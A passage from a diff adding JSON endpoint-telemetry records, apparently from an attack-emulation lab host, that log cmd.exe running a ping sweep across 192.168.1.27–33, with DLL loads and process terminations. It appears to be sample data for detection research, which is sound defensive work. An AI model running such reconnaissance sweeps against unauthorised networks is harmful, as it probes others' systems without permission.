"unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "process", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572116990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.27", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2812, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": 
"{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "process", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572121840000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.28", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2416, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572121990000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}", + "unique_ppid": 
"{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": 
"{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "process", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572126990000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.29", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + 
"parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6660, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, 
+ { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127300000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127300000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127300000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "process", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572131990000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.30", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6172, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + 
"event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6172, + 
"process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "process", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572136830000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.31", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3476, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572136980000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": 
"KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3476, + "process_name": "PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572137140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "process", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572141840000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.32", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6672, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": 
"C:\\Windows\\System32\\kernel32.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "process", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572146830000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.33", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2216, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": 
"C:\\Windows\\System32\\ntdll.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": 